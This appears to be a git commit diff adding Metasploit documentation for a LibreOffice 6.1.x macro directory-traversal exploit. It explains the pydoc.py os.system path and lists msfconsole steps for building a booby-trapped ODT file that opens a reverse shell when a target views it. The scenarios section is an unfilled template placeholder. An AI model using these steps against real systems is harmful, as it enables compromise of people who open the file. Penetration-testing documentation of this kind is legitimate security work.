added most of documentation
parent
391e7cf8ef
commit
da0c0d7d3f
|
@ -0,0 +1,41 @@
|
|||
## Description
|
||||
|
||||
This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.4.1` that enables remote code execution.
|
||||
Note: `6.0.x` versions are vulnerable to the directory traversal attack, but are not exploitable by this module due to the
|
||||
lack of ability to pass arguments.
|
||||
|
||||
LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events
|
||||
to them. A macro can be tied to a program event by including the script that contains the macro and the function
|
||||
name to be executed. Additionally, a directory traversal vulnerability exists in the component that references the
|
||||
Python script to be executed. This allows a program event to execute functions from Python scripts relative to the
|
||||
path of the samples macros folder. The `pydoc.py` script included with LibreOffice contains the `tempfilepager` function
|
||||
that passes arguments to `os.system`, allowing RCE.
|
||||
|
||||
This module generates an ODT file with a mouse over event that when triggered, will execute arbitrary code.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
LibreOffice `v6.1.0-6.1.4.1`. Vulnerable versions for both Windows and Linux can be found [here](https://downloadarchive.documentfoundation.org/libreoffice/old/).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/multi/fileformat/libreoffice_macro_exec```
|
||||
4. Do: ```set FILENAME <name>```
|
||||
5. Do: ```set LHOST <ip>```
|
||||
6. Do: ```set LPORT <port>```
|
||||
7. Do: ```run```
|
||||
8. Move the generated file to the target
|
||||
9. Open the file with a vulnerable version of LibreOffice
|
||||
10. You should get a shell.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Version of software and OS as applicable
|
||||
|
||||
```
|
||||
msf > use module_name
|
||||
msf auxiliary(module_name) > set POWERLEVEL >9000
|
||||
msf auxiliary(module_name) > exploit
|
||||
```
|
Loading…
Reference in New Issue